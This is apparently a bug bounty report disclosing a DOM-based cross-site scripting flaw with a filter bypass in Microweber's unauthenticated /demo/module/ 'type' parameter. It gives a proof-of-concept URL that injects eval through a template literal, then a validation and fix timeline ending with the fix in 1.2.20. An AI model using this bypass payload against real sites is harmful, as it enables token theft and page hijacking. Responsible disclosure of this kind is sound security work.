Cross-site scripting - DOM in microweber/microweber

Valid

Reported on

Jul 7th 2022


Description

DOM XSS with filter bypass on /demo/module/ using type parameter without authentication.

Proof of Concept

https://demo.microweber.org/demo/module/?type=files/xss%27;eval.call`${%27alert\x28window.origin\x29%27}`;//&live_edit=true&remeber_path=true&ui=basic&start_path=media_host_base&from_admin=true&file_types=images&id=mw_admin_pictures_upload_browse_existing_modaledit-post-gallery-main&from_url=http://google.com/

PoC Image

image

Impact

The attacker can:

  • Steal token to perform CSRF.
  • Fetch contents from same-site page.
  • Redirect user. ...
We are processing your report and will contact the microweber team within 24 hours. 10 months ago
Nhien.IT modified the report
10 months ago
Nhien.IT modified the report
10 months ago
Nhien.IT modified the report
10 months ago
We have contacted a member of the microweber team and are waiting to hear back 10 months ago
Peter Ivanov validated this vulnerability 10 months ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 1.2.20 with commit 79c691 10 months ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation